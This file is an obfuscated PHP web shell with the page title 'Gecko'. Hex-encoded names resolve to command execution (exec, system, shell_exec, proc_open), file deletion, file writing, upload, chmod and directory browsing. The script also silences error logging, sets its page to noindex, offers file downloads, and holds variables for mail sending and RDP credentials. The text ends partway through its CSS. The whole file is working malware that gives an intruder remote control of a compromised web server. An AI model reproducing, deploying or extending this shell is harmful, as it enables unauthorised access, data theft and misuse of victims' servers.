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${"GLOBA\x4c\x53"}["\x70f\x78\x6f\x64\x76m"]="\x69n\x66\x6f";${"\x47\x4c\x4f\x42\x41L\x53"}["ub\x68k\x6f\x7aos\x63\x74"]="\x70e\x72\x6d\x73";${"\x47\x4c\x4f\x42A\x4cS"}["awq\x65zw\x73\x6dr\x75\x71"]="\x6e\x61\x6da\x4eya";${"GL\x4f\x42AL\x53"}["\x6cx\x62\x6d\x76\x6btxhf"]="e\x78\x74\x65\x6e\x73\x69";${"\x47\x4c\x4f\x42\x41L\x53"}["\x67\x73\x64\x72ep\x6ffs\x70"]="\x77in\x56\x61\x6c";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x64s\x78\x6f\x6b\x6b\x76"]="w\x69\x6e\x4e\x75m";${"\x47\x4c\x4f\x42\x41LS"}["\x6e\x79w\x79d\x64l\x67\x7a"]="\x77\x69\x6e\x41\x72r";${"\x47LO\x42\x41\x4c\x53"}["bq\x65fb\x6cglke"]="pc\x68";${"\x47L\x4f\x42A\x4cS"}["\x70v\x72huqdne\x78i"]="\x72\x65\x61d\x44i\x72";${"G\x4c\x4fB\x41\x4cS"}["ymsy\x77\x78\x70\x62"]="op\x65\x6e\x44\x69\x72";${"\x47\x4c\x4f\x42\x41L\x53"}["\x62\x6f\x6avm\x6d\x6cz\x62\x6b\x73"]="\x64\x69\x72";${"\x47LO\x42\x41\x4cS"}["\x79c\x78\x73\x70\x70\x77\x75"]="\x66\x69\x6c\x65\x73";${"\x47LO\x42AL\x53"}["\x6eng\x65\x72\x78\x6bd\x6cn"]="d\x69rs";${"\x47L\x4fB\x41\x4c\x53"}["\x66\x66g\x63g\x6a\x73\x6c\x70\x68\x6br"]="\x74\x65\x784";${"\x47\x4c\x4fB\x41\x4cS"}["tt\x6d\x78yxq\x66\x63\x72\x69"]="\x74\x65\x78\x33";${"\x47\x4cO\x42\x41\x4c\x53"}["\x68\x78\x6f\x70\x71\x64j\x70v"]="t\x65\x78\x31";${"\x47\x4cO\x42\x41\x4cS"}["\x74oo\x6e\x61\x6f\x6d\x78\x75\x74"]="p\x72\x6fc\x65\x73s";${"\x47\x4cO\x42\x41\x4c\x53"}["vbx\x6fw\x70\x68\x76\x6br"]="\x66";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77\x79\x66a\x68bu\x76\x73q"]="o\x75\x74";${"\x47LO\x42ALS"}["\x77\x73\x70\x6f\x78\x61"]="\x69\x6e";${"G\x4c\x4fB\x41L\x53"}["\x6cy\x72\x6fh\x6dv\x6ce"]="\x72e";${"\x47\x4cOBA\x4c\x53"}["\x79n\x6c\x71\x79l\x6f"]="d\x6f\x6d\x61\x69n\x73";${"\x47\x4cO\x42\x41\x4cS"}["\x67\x6a\x6b\x6a\x66lf\x79\x6e\x67"]="\x640m\x61in";${"GL\x4f\x42\x41\x4c\x53"}["\x67\x64bd\x6eg\x75\x69\x6b\x6f\x71"]="\x63\x6f\x75nt";${"\x47\x4cO\x42A\x4c\x53"}["mm\x70n\x72b\x62ivtk"]="\x64om";${"\x47\x4cOB\x41L\x53"}["\x74\x78\x6d\x66\x77\x75\x6d\x62\x71s"]="\x640\x6da\x69\x6e\x73";${"GL\x4f\x42\x41L\x53"}["k\x6c\x6du\x75\x6f\x78"]="\x70\x6c";${"\x47\x4cO\x42\x41\x4cS"}["\x6e\x74o\x79\x72\x79\x64\x66"]="\x78\x70\x6c\x64";${"G\x4cO\x42\x41\x4c\x53"}["\x76y\x66\x7a\x68t\x64\x63\x78\x73"]="xp\x6cod";${"\x47\x4cO\x42\x41\x4cS"}["\x78\x7a\x74o\x66xl\x63"]="n";${"\x47\x4c\x4f\x42AL\x53"}["\x78t\x71\x79\x6a\x6dm\x7axn\x6dc"]="\x79";${"G\x4c\x4fB\x41L\x53"}["\x74\x66\x71z\x79u\x71"]="byt\x65\x73";${"\x47L\x4f\x42\x41\x4c\x53"}["\x63\x77q\x79\x66\x6axpk\x70"]="\x74\x79\x70e\x73";${"\x47\x4c\x4f\x42\x41L\x53"}["\x6b\x6c\x72d\x74qi\x6b\x6fx\x71l"]="p\x72o\x63\x4d\x61i\x6c\x53m\x54p";${"G\x4c\x4fBA\x4cS"}["\x6d\x6em\x64t\x66\x67"]="\x6de\x73s\x61g\x65\x4d\x61\x69l";${"\x47\x4cOB\x41\x4cS"}["\x6ejf\x77\x77\x69\x63\x76\x64"]="h\x65\x61d\x65r\x73M\x61\x69\x6c";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x78\x6a\x61\x73\x64\x73\x70"]="ema\x69lS\x75\x62j\x65ct";${"\x47L\x4fBALS"}["\x6aue\x63ic"]="\x65\x6d\x61\x69\x6c\x54o";${"\x47L\x4f\x42\x41\x4c\x53"}["z\x68\x75x\x65c\x71k\x67"]="e\x6da\x69l\x46\x72\x6fm";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["x\x61rl\x6d\x75\x6c\x78\x63v"]="\x70a\x73s\x52\x44P";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x75vj\x76\x62\x66\x62\x65q"]="u\x73\x65\x72RD\x50";${"G\x4cOB\x41L\x53"}["\x72\x73\x62\x70\x66l\x65\x65u"]="\x66\x6c\x65\x73N\x61\x6d\x65";${"GL\x4f\x42A\x4c\x53"}["\x79\x68\x77\x6f\x62\x74y"]="\x70as\x73\x77\x6f\x72\x64";${"G\x4c\x4f\x42\x41\x4c\x53"}["e\x70\x6e\x79\x74\x63\x6a"]="\x75\x73\x65rn\x61\x6d\x65";${"\x47L\x4f\x42A\x4c\x53"}["\x6bc\x66\x66m\x6c\x7ae\x73\x72"]="\x72\x65\x6e\x61m\x65\x46\x69\x6c\x65";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x76\x6d\x6c\x63i\x67o\x77f\x77"]="nama\x46i\x6ce";${"\x47\x4c\x4f\x42AL\x53"}["b\x6ej\x74\x6ddd\x76"]="\x4eama\x46o\x6cd\x65\x72";${"\x47\x4c\x4fB\x41L\x53"}["npd\x73ore\x77"]="rmdir";${"\x47\x4c\x4fB\x41\x4cS"}["\x67\x69un\x77\x76r"]="r\x6d\x66\x69\x6ce";${"G\x4cO\x42\x41\x4c\x53"}["\x75l\x69\x6ea\x6f\x6a\x79"]="fd";${"\x47\x4cO\x42\x41\x4cS"}["\x65v\x6d\x78\x6c\x63\x65g\x62\x75\x70"]="\x69t";${"\x47\x4c\x4fB\x41\x4c\x53"}["y\x62\x70v\x67\x7a\x6cr\x74f\x6fi"]="\x69te\x6d\x73";${"G\x4cO\x42\x41L\x53"}["\x71\x63k\x67\x6a\x66\x74\x79"]="\x55\x52\x4c";${"\x47\x4c\x4fBAL\x53"}["e\x6e\x7a\x6c\x6dv\x70\x79vfh"]="\x70u\x74\x5f\x68\x74t";${"\x47\x4cO\x42\x41L\x53"}["k\x78\x6b\x69ga\x75\x65\x70"]="\x44\x4fC\x5f\x52\x4fO\x54";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x67\x6f\x6bl\x74\x62k\x65"]="\x43u\x72\x72\x65\x6et\x46i\x6c\x65";${"\x47\x4c\x4fB\x41\x4cS"}["f\x79\x69\x6d\x79\x69\x7abxu"]="\x74\x6d\x70\x4e\x61\x6d\x65";${"\x47L\x4f\x42\x41\x4c\x53"}["\x6c\x79\x68z\x68i\x78\x64u"]="hndl\x65r\x73";${"G\x4c\x4fB\x41LS"}["t\x6f\x64\x77xo\x66g\x63p"]="\x68\x61\x6e\x64\x6c\x65r";${"GL\x4fB\x41\x4c\x53"}["\x6cscmcd\x70wlp\x75\x6a"]="\x54\x6d\x70\x4eam\x65\x73";${"\x47L\x4fB\x41\x4c\x53"}["w\x68\x67xn\x6a\x6ev\x6cm"]="\x63\x75r\x46i\x6ce";${"\x47\x4cO\x42A\x4c\x53"}["\x62\x72\x76\x6bk\x67"]="\x63\x6fn\x6e\x74";${"\x47\x4c\x4fBA\x4cS"}["\x6dp\x6f\x67\x72n\x71"]="\x50\x6fr\x74\x53erve\x72";${"\x47LOB\x41L\x53"}["\x71\x6a\x65\x6b\x67\x71h"]="\x48\x6f\x73t\x53\x65r\x76\x65\x72";${"G\x4cOB\x41L\x53"}["a\x74\x65\x78\x65\x6a\x76b"]="r\x5f\x74\x65xt";${"\x47\x4cO\x42A\x4c\x53"}["\x6bd\x77\x76\x66\x6ecz\x64\x6b\x71"]="\x72\x65\x73\x70\x6f\x6es\x65";${"\x47\x4c\x4fBA\x4c\x53"}["b\x6cq\x6az\x68\x7a\x6fu\x65f\x7a"]="_\x46";${"GLOB\x41LS"}["\x73f\x6f\x71d\x63\x7a\x6e\x65"]="_\x44";${"\x47LO\x42A\x4c\x53"}["\x71d\x6d\x6axomio\x7afb"]="\x76a\x6c";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x78\x66l\x78\x66\x76\x71"]="\x69d";${"\x47\x4c\x4fBA\x4c\x53"}["\x79k\x6e\x6f\x6f\x65"]="\x63w\x64";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x72\x6b\x68m\x68r\x65\x69\x6b\x78\x77"]="\x67et_\x63\x77\x64";${"\x47\x4cO\x42\x41\x4cS"}["y\x68\x70ub\x71\x68\x62"]="\x66\x69\x6c\x65\x5fm\x61\x6e\x61\x67\x65\x72";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x67\x75\x61\x6e\x71\x64\x64"]="\x66\x75\x6eg\x73\x69";${"G\x4c\x4f\x42A\x4cS"}["ps\x70\x69\x6bj\x6d\x73o\x76"]="f\x69\x6c\x65";${"G\x4cO\x42\x41\x4c\x53"}["qq\x67fi\x67\x62\x64"]="\x63d\x69\x72";${"\x47\x4cOB\x41\x4c\x53"}["eq\x6b\x76\x67\x6f\x70\x74\x66v\x6b\x6c"]="\x69";${"\x47\x4c\x4fBALS"}["\x76\x63qq\x72\x6c\x71\x62\x6f"]="\x41\x72\x72\x61\x79";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["v\x6d\x6fl\x67t\x6f\x66"]="\x68\x69t\x75\x6e\x67\x5fa\x72r\x61y";${"\x47L\x4f\x42A\x4cS"}["b\x70\x66\x63am"]="f\x75\x6e\x67\x73\x69";session_start();@set_time_limit(0);$fjefugcrciuq="\x41r\x72\x61\x79";@clearstatcache();@ini_set("e\x72ro\x72\x5fl\x6fg",NULL);@ini_set("\x6c\x6f\x67_e\x72ro\x72\x73",0);@ini_set("\x6d\x61\x78\x5f\x65x\x65c\x75t\x69\x6fn_t\x69\x6de",0);$yienlc="i";@ini_set("o\x75\x74pu\x74_\x62u\x66\x66e\x72\x69n\x67",0);$hqmsvsrew="f\x75ng\x73\x69";$xwvqjmtohbor="\x66\x75\x6egs\x69";${"\x47L\x4fB\x41\x4c\x53"}["r\x74\x6f\x6c\x67\x6c"]="\x69";${"\x47\x4c\x4f\x42AL\x53"}["ys\x6a\x6c\x7a\x76\x72o"]="\x68\x69t\x75\x6e\x67_\x61\x72\x72a\x79";${"GL\x4f\x42AL\x53"}["g\x78\x76\x79\x67t"]="fu\x6e\x67s\x69";@ini_set("d\x69s\x70l\x61\x79\x5f\x65\x72ror\x73",0);${$fjefugcrciuq}=["6\x37\x36\x357\x34\x3637764","\x36\x37\x36c\x36\x6662","\x36\x39\x373\x35\x666\x34\x36\x397\x32","69\x3735\x666\x36\x369\x36\x636\x35","69\x373\x35\x6677\x3726\x397\x3461626\x63\x365","\x36\x3973\x35\x66\x37\x32\x36\x35\x36\x31\x364\x361626c6\x35","66696c\x36570\x36\x35\x372\x36d\x373","\x36\x36\x36\x39\x36c\x36\x35","706\x38\x37\x30\x35\x66\x3756\x65\x361\x36\x64\x365","6765\x374\x35\x66\x363\x37\x35\x372\x372\x36\x35\x36e7\x345\x667\x357365\x372","\x36\x387\x346\x64\x36\x63\x37370\x365\x3636\x39\x3616c6\x33\x36\x38617\x32\x373","6\x36\x369\x36\x63655f\x367\x36574\x35\x66636\x66\x36\x65\x37465\x36e\x37\x34\x373","6\x646b\x364\x369\x37\x32","746f\x375\x36368","6\x3368\x36\x346\x39\x372","\x37\x326\x356e\x36\x316\x64\x36\x35","6\x35\x37\x3865\x36\x33","\x37\x306\x31\x373\x373\x37\x34\x3687\x32\x375","\x373\x379\x373\x37\x34\x36\x356\x64","7\x3368\x3656c6c5f\x36\x357\x38\x36\x356\x33","7\x306\x66\x37\x30\x36\x35\x36e","\x37\x30\x3636c\x36\x66\x37365","73\x37\x347\x32\x36\x35\x36\x31\x36\x645f\x36\x3765\x37\x34\x35\x66\x36\x336f\x36\x65\x37\x346\x35\x36\x6574\x373","707\x32\x36\x66\x36\x33\x35f6\x667\x30\x365\x36e","\x375\x36e\x36\x63696\x656\x62","\x372\x36\x64\x36\x346972","6\x36\x36\x66\x3706\x356e","\x36\x366\x33\x36\x63\x36\x667\x33\x36\x35","\x36\x366\x39\x36c6\x355f7\x30\x375\x3745f6\x336f\x36\x657\x346\x356\x65\x3747\x33","6\x64\x36f\x376\x36\x355\x6675706\x636\x666\x3164\x36\x356\x34\x35f666\x39\x36c6\x35","\x36\x33\x36\x386d\x36f\x36\x34","\x37\x337\x39\x37\x33\x35f6\x3765\x3745f\x374\x365\x36d\x37\x30\x35f\x364\x369\x372",];${${"\x47\x4cOBALS"}["\x76\x6d\x6fl\x67t\x6f\x66"]}=count(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x76c\x71\x71\x72lq\x62\x6f"]});for(${$yienlc}=0;${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x65\x71k\x76\x67\x6f\x70t\x66v\x6b\x6c"]}&lt;${${"\x47\x4cO\x42\x41\x4cS"}["y\x73\x6a\x6c\x7a\x76\x72\x6f"]};${${"\x47\x4c\x4f\x42\x41L\x53"}["\x72\x74\x6fl\x67\x6c"]}++){${"G\x4cO\x42\x41\x4c\x53"}["bp\x73fs\x71\x69\x65\x6c"]="\x66un\x67\x73i";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x62\x70\x73\x66\x73qi\x65\x6c"]}[]=unx(${${"\x47\x4c\x4f\x42\x41\x4cS"}["v\x63q\x71\x72l\x71\x62\x6f"]}[${${"G\x4cOB\x41L\x53"}["\x65\x71\x6b\x76\x67\x6fp\x74\x66\x76k\x6c"]}]);}if(isset($_GET["d"])){$lbcuxxaisydr="\x63\x64\x69r";${"G\x4c\x4fB\x41\x4c\x53"}["\x75\x6b\x62g\x6b\x65d\x73"]="\x66\x75\x6e\x67si";${${"\x47L\x4f\x42AL\x53"}["\x71\x71g\x66\x69g\x62d"]}=unx($_GET["d"]);${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["u\x6b\x62g\x6be\x64s"]}[14](${$lbcuxxaisydr});}else{${"\x47\x4c\x4fB\x41\x4cS"}["k\x75\x73\x73pd\x6d\x6b\x72\x75"]="cd\x69\x72";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x74\x72\x77k\x77\x75\x75g"]="\x66\x75\x6e\x67\x73\x69";${${"\x47LO\x42\x41\x4c\x53"}["\x6buss\x70\x64\x6dk\x72u"]}=${${"GLOB\x41LS"}["\x74\x72w\x6bw\x75\x75g"]}[0]();}function download($file){if(file_exists(${${"GL\x4f\x42\x41\x4c\x53"}["p\x73\x70\x69\x6b\x6a\x6ds\x6fv"]})){header("\x43\x6f\x6e\x74\x65\x6e\x74-\x44e\x73\x63\x72\x69\x70t\x69o\x6e:\x20F\x69\x6c\x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54\x72a\x6e\x73fe\x72");$cfctim="\x66\x69\x6c\x65";header("\x43\x6fnte\x6e\x74-\x54\x79\x70e:\x20a\x70\x70li\x63a\x74\x69on/o\x63\x74e\x74-\x73t\x72eam");header("\x43\x6fnt\x65n\x74-D\x69s\x70osi\x74i\x6fn:\x20at\x74\x61\x63hme\x6et;\x20\x66\x69\x6c\x65\x6e\x61\x6de\x3d".basename(${$cfctim}));header("C\x6fn\x74\x65n\x74-\x54ran\x73\x66er-\x45\x6ec\x6f\x64\x69n\x67:\x20\x62\x69n\x61\x72y");$dfxrdgfkcp="\x66i\x6ce";header("\x45xp\x69res:\x20\x30");header("C\x61c\x68e-Co\x6e\x74\x72\x6fl:\x20\x6dus\x74-r\x65v\x61\x6cida\x74e");header("Prag\x6da: p\x75blic");${"\x47\x4c\x4f\x42\x41\x4c\x53"}["n\x6c\x79\x66\x7a\x74pt\x76\x79"]="fi\x6c\x65";header("\x43o\x6et\x65\x6e\x74-\x4cen\x67\x74\x68: ".filesize(${$dfxrdgfkcp}));ob_clean();flush();readfile(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6el\x79f\x7at\x70\x74\x76\x79"]});exit;}}if($_GET["d\x6f\x6e"]==true){${"\x47\x4c\x4fB\x41\x4cS"}["i\x66\x71\x71\x78\x79\x6f"]="F\x69le\x73D\x6fn";${${"\x47\x4cOB\x41L\x53"}["i\x66q\x71\x78\x79\x6f"]}=download(unx($_GET["\x64on"]));}$shgeieuiqp="ge\x74\x5f\x63\x77d";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x6aw\x6c\x74\x72"]="f\x75ngsi";echo "&lt;\x21\x44\x4f\x43T\x59P\x45 \x68\x74\x6dl\x3e\n&lt;h\x74\x6dl\x20lang\x3d\x22\x65n\x22\x3e\n\n\x3ch\x65\x61\x64\x3e\n  \x20 \x3c\x6d\x65\x74\x61 \x63\x68\x61r\x73\x65\x74\x3d\x22\x55T\x46-\x38\"\x3e\n\x20\x20\x20 &lt;\x6d\x65t\x61 \x68tt\x70-\x65\x71uiv=\x22\x58-UA-\x43o\x6d\x70at\x69\x62le\" \x63\x6f\x6etent\x3d\x22\x49E\x3d\x65\x64\x67e\x22&gt;\n  \x20 \x3cm\x65\x74a n\x61m\x65\x3d\"\x67o\x6f\x67l\x65\x62o\x74\" \x63o\x6ete\x6et=\"noin\x64ex\"\x3e\n \x20  \x3c\x74\x69tl\x65\x3eG\x65ck\x6f [ ";echo $_SERVER["SE\x52\x56\x45\x52\x5fNAM\x45"];echo " ]\x3c/\x74it\x6c\x65&gt;\n\x20\x20\x20 \x3c\x73\x63r\x69\x70\x74\x20sr\x63\x3d'\x68\x74tp\x73://\x6bit.\x66\x6f\x6et\x61\x77es\x6f\x6d\x65.\x63\x6fm/057b\x39b51\x30c.\x6a\x73' \x63r\x6f\x73\x73\x6f\x72\x69gi\x6e=\x27\x61\x6eony\x6dous'\x3e&lt;/\x73\x63r\x69pt\x3e\n  \x20\x20&lt;\x73\x63r\x69p\x74\x20\x73\x72c\x3d\x22h\x74t\x70s://a\x6a\x61x.g\x6f\x6fglea\x70i\x73\x2ec\x6fm/\x61j\x61x/\x6cibs/jq\x75\x65r\x79/\x33\x2e\x36\x2e\x31/j\x71\x75\x65ry.\x6d\x69\x6e.\x6as\x22&gt;&lt;/scri\x70\x74&gt;\n\x20\x20\x20\x20\x3cs\x63rip\x74\x20src=\x22//\x63dn\x2e\x6a\x73\x64el\x69vr.net/np\x6d/s\x77\x65\x65\x74al\x65\x72\x742@11\"\x3e\x3c/scrip\x74\x3e\n \x20\x20\x20&lt;\x73\x74y\x6ce&gt;\n\x20\x20  \x20   \x2e\x62tn-s\x75bmit,\n\x20      \x20\x61\x20{\n\x20\x20\x20\x20     \x20\x20\x20\x74ext-\x64ec\x6f\x72\x61\x74i\x6f\x6e:\x20no\x6e\x65\x3b\n  \x20\x20\x20  \x20\x20 \x20 \x63\x6flo\x72:\x20#\x66ff\n\x20\x20  \x20\x20 \x20}\n\n \x20 \x20\x20\x20 \x20a,\n\x20 \x20 \x20 \x20\x20bo\x64y {\n   \x20\x20 \x20\x20\x20 \x20\x20\x63o\x6c\x6fr:\x20\x23\x66\x66\x66\n\x20 \x20\x20\x20\x20\x20\x20}\n\n  \x20\x20  \x20 .b\x74\x6e-\x73\x75\x62m\x69\x74,\n \x20 \x20\x20\x20 \x20.fo\x72m-\x66i\x6c\x65,\n  \x20 \x20 \x20 t\x62ody \x74\x72:n\x74\x68-\x63hi\x6c\x64(2n)\x20{\n\x20\x20 \x20\x20 \x20 \x20 \x20 \x62ack\x67\x72\x6f\x75\x6ed-c\x6f\x6c\x6f\x72: \x23\x32\x32\x3242d\n\x20\x20\x20\x20 \x20\x20\x20}\n\n      \x20\x20\x2ecod\x65-\x65\x64it\x6fr,\n\x20 \x20     .\x6d\x6f\x64a\x6c,\n\x20 \x20\x20 \x20\x20 .te\x72\x6di\x6eal {\n \x20\x20  \x20\x20     \x70os\x69\x74ion: fi\x78ed\x3b\n\x20 \x20\x20 \x20\x20   \x20\x20to\x70: 0;\n\x20 \x20 \x20\x20\x20\x20\x20  \x20\x6ce\x66t: \x30;\n\x20\x20 \x20\x20\x20 \x20 \x20\x20\x20r\x69\x67\x68\x74:\x200\x3b\n  \x20\x20\x20\x20   \x20\x20\x20\x62ottom: 0\n \x20\x20\x20  \x20 }\n\n    \x20 \x20 .c\x6f\x64\x65-e\x64\x69\x74or-b\x6f\x64\x79 t\x65\x78t\x61r\x65\x61,\n  \x20   \x20\x20\x2et\x65\x72\x6di\x6ea\x6c-\x62\x6fdy\x20\x74\x65\x78t\x61re\x61\x20{\n \x20\x20  \x20\x20\x20 \x20  \x77\x69d\x74h:\x2098.5\x25;\n\x20 \x20\x20 \x20\x20\x20\x20\x20 \x20hei\x67ht:\x2040\x30\x70x;\n \x20  \x20   \x20 \x20 \x66ont-\x73\x69\x7a\x65: \x73ma\x6c\x6cer;\n\x20 \x20\x20\x20\x20 \x20\x20\x20\x20 \x72\x65size: \x6eo\x6e\x65\n \x20\x20\x20  \x20 }\n\n\x20 \x20  \x20\x20\x20.\x6denu-to\x6f\x6c\x73\x20\x6c\x69,\n \x20\x20\x20\x20  \x20.te\x72\x6d\x69nal-bod\x79\x20li,\n\x20\x20 \x20  \x20 \x2e\x74ermi\x6ea\x6c-\x68ead\x20\x6ci\x20{\n\x20   \x20\x20\x20\x20 \x20 \x20di\x73\x70\x6c\x61y:\x20inl\x69ne-\x62l\x6fck\n\x20  \x20  \x20\x20}\n\n\x20   \x20 \x20\x20b\x6f\x64\x79 {\n\x20 \x20\x20 \x20 \x20 \x20\x20\x20\x62\x61\x63k\x67ro\x75\x6ed-c\x6f\x6c\x6f\x72: \x230e0\x661\x37;\n \x20\x20 \x20 \x20  \x20  f\x6f\x6e\x74-\x66a\x6d\x69\x6c\x79: mon\x6fs\x70\x61\x63\x65\n \x20\x20\x20   \x20}\n\n  \x20 \x20 \x20\x20\x2eb\x74n-m\x6fd\x61\x6c-cl\x6fs\x65:\x68\x6f\x76er,\n \x20 \x20 \x20  \x2e\x62t\x6e-\x73\x75b\x6d\x69t:\x68o\x76e\x72,\n\x20\x20   \x20 \x20.m\x65nu-f\x69l\x65-\x6d\x61nag\x65\x72\x20ul,\n  \x20\x20\x20 \x20 \x2e\x70\x61th-p\x77d,\n \x20\x20\x20 \x20  \x74hea\x64\x20{\n\x20 \x20 \x20\x20\x20\x20\x20  \x20\x62ac\x6b\x67ro\x75n\x64-\x63olor:\x20\x232e\x3313\x64\n\x20 \x20\x20  \x20\x20}\n\n\x20\x20\x20 \x20 \x20\x20\x75\x6c {\n   \x20\x20\x20  \x20\x20  \x6cist-st\x79\x6c\x65: \x6eo\x6ee\n\x20\x20  \x20\x20\x20 }\n\n  \x20\x20\x20\x20 \x20\x2e\x6d\x65nu-he\x61\x64e\x72\x20l\x69 {\n  \x20 \x20\x20  \x20 \x20 \x70ad\x64in\x67: 5\x70\x78\x20\x30\n\x20  \x20  \x20\x20}\n\n \x20     \x20\x2e\x6d\x65\x6e\x75-\x68\x65ader u\x6c \x6c\x69\x20{\n\x20  \x20    \x20\x20  \x66o\x6e\x74-\x77\x65\x69\x67\x68t:\x20700\x3b\n\x20  \x20\x20 \x20\x20  \x20\x20f\x6f\x6e\x74-\x73t\x79le:\x20\x69\x74alic\n       \x20}\n\n\x20   \x20  \x20.\x62\x74\x6e-\x73\x75\x62\x6dit\x20{\n \x20\x20 \x20\x20\x20 \x20\x20\x20 \x70ad\x64ing:\x207p\x78\x2025px;\n\x20  \x20   \x20\x20  \x20b\x6fr\x64er: 2p\x78\x20s\x6fl\x69\x64 g\x72\x65y\x3b\n \x20 \x20\x20\x20 \x20 \x20  \x62\x6fr\x64e\x72-radiu\x73:\x20\x34p\x78\n  \x20\x20  \x20\x20}\n\n\x20\x20  \x20  \x20\x2e\x66orm-\x66\x69\x6ce,\n \x20\x20 \x20 \x20 \x61:hov\x65\x72 {\n\x20\x20\x20\x20\x20\x20\x20  \x20  \x63ol\x6fr:\x20\x23\x635c8\x64\x36\n      \x20\x20}\n\n  \x20\x20\x20\x20\x20\x20\x2ebtn-su\x62mit:\x68ov\x65\x72\x20{\n\x20\x20  \x20 \x20\x20\x20   b\x6f\x72\x64\x65\x72:\x202px\x20\x73\x6fl\x69d #c5c8d6\n  \x20\x20 \x20  }\n\n \x20\x20 \x20  \x20.\x66\x6f\x72\x6d-u\x70loa\x64\x20{\n \x20\x20 \x20\x20\x20\x20\x20\x20\x20\x20mar\x67\x69n:\x201\x30\x70\x78 0\n  \x20\x20\x20 \x20\x20}\n\n \x20\x20\x20    \x2ef\x6fr\x6d-f\x69\x6c\x65 {\n\x20 \x20 \x20   \x20  \x20\x62\x6f\x72\x64\x65\x72: 2\x70x\x20s\x6fl\x69\x64\x20g\x72ey\x3b\n  \x20\x20\x20\x20  \x20\x20\x20\x20p\x61d\x64ing:\x207\x70x 2\x30p\x78\x3b\n\x20  \x20\x20 \x20\x20    \x62\x6f\x72\x64\x65r-\x72a\x64i\x75s:\x204\x70x\n\x20\x20\x20\x20\x20\x20 \x20}\n\n   \x20\x20   \x2emenu-t\x6fols\x20{\n\x20\x20\x20\x20\x20   \x20 \x20\x20w\x69\x64t\x68: 95%\n\x20 \x20\x20\x20\x20\x20 }\n\n\x20 \x20 \x20 \x20\x20.m\x65nu-\x74ool\x73\x20li {\n\x20   \x20\x20\x20\x20 \x20  \x6da\x72\x67i\x6e:\x20\x31\x35\x70x 0\n       \x20}\n\n      \x20 \x2e\x6d\x65\x6e\x75-f\x69\x6ce-\x6dan\x61\x67\x65r,\n\x20\x20\x20  \x20\x20 .\x6do\x64a\x6c-ma\x69\x6c-\x74e\x78\x74 {\n \x20 \x20 \x20\x20\x20  \x20 \x6da\x72g\x69n:\x20\x31\x30p\x78 \x340px\n\x20   \x20\x20  }\n\n\x20    \x20\x20 \x2e\x6de\x6e\x75-\x66i\x6c\x65-m\x61nager\x20l\x69\x20{\n\x20     \x20 \x20   \x64is\x70la\x79:\x20i\x6e\x6cin\x65-b\x6co\x63\x6b;\n\x20\x20     \x20\x20\x20  \x6da\x72gi\x6e:\x201\x35\x70\x78\x20\x320\x70x\n\x20\x20 \x20  \x20\x20}\n\n \x20\x20 \x20   \x2e\x6d\x65nu-\x66\x69le-m\x61n\x61ger \x6ci\x20a::a\x66\x74e\x72\x20{\n   \x20\x20\x20 \x20\x20\x20  c\x6fn\x74\x65n\x74:\x20\"\";\n   \x20  \x20 \x20 \x20\x20\x64ispla\x79: b\x6co\x63k\x3b\n\x20\x20\x20\x20  \x20\x20   \x20\x62\x6f\x72d\x65r-\x62ott\x6f\x6d: \x31px\x20so\x6c\x69d\x20\x23\x66ff\n\x20\x20 \x20\x20\x20 \x20}\n\n\x20\x20\x20    \x20\x2epa\x74h-\x70\x77d\x20{\n\x20  \x20\x20  \x20\x20  \x20p\x61\x64\x64i\x6eg:\x20\x315p\x78 0\x3b\n\x20\x20\x20\x20\x20\x20\x20   \x20\x20ma\x72\x67i\x6e:\x20\x35\x70x\x200\n    \x20\x20  }\n\n \x20\x20\x20 \x20  ta\x62\x6ce {\n\x20     \x20\x20\x20\x20\x20 bo\x72\x64\x65r-radiu\x73: 5\x70x\n\x20 \x20   \x20\x20}\n\n\x20\x20\x20\x20\x20 \x20\x20\x74\x68\x65ad\x20{\n    \x20\x20\x20\x20\x20\x20\x20\x20h\x65ig\x68t: 35px\n     \x20  }\n\n   \x20  \x20\x20tbody t\x72 t\x64\x20{\n\x20\x20 \x20\x20\x20\x20\x20\x20\x20 \x20pa\x64d\x69\x6e\x67: \x31\x30px \x30\n\x20 \x20\x20\x20\x20\x20\x20}\n\n\x20 \x20 \x20 \x20\x20t\x62od\x79 tr\x20t\x64:nt\x68-\x63hild(\x32),\n\x20\x20 \x20\x20\x20 \x20\x74\x62\x6f\x64\x79 \x74r\x20\x74\x64:\x6e\x74h-\x63\x68il\x64(3),\n \x20\x20 \x20   \x74\x62\x6fdy\x20tr \x74\x64:nth-chil\x64(\x34) {\n  \x20 \x20\x20\x20 \x20 \x20 text-\x61l\x69gn: \x63e\x6e\x74er\n   \x20 \x20\x20 }\n\n \x20\x20  \x20\x20\x20::-\x77\x65\x62\x6bit-scr\x6f\x6c\x6c\x62\x61r {\n \x20 \x20   \x20\x20\x20 \x20wi\x64\x74h:\x201\x36px\n \x20\x20 \x20 \x20 }\n\n\x20\x20  \x20\x20\x20\x20::-webk\x69t-s\x63ro\x6clb\x61\x72-\x74r\x61c\x6b\x20{\n\x20\x20     \x20\x20\x20 \x20\x62a\x63kground: \x230e\x30f\x317\n\x20  \x20\x20\x20  }\n\n    \x20\x20\x20\x20::-\x77\x65\x62kit-\x73\x63\x72o\x6c\x6c\x62\x61\x72-th\x75m\x62\x20{\n\x20\x20    \x20\x20  \x20 b\x61c\x6b\x67ro\x75\x6ed: #2\x32242\x64\x3b\n \x20\x20   \x20\x20    bor\x64er: \x32\x70x s\x6f\x6ci\x64\x20#555;\n\x20 \x20\x20\x20\x20\x20\x20\x20 \x20 b\x6fr\x64er-\x72a\x64\x69us: \x34\x70\x78\n\x20\x20   \x20\x20\x20}\n\n  \x20\x20 \x20\x20 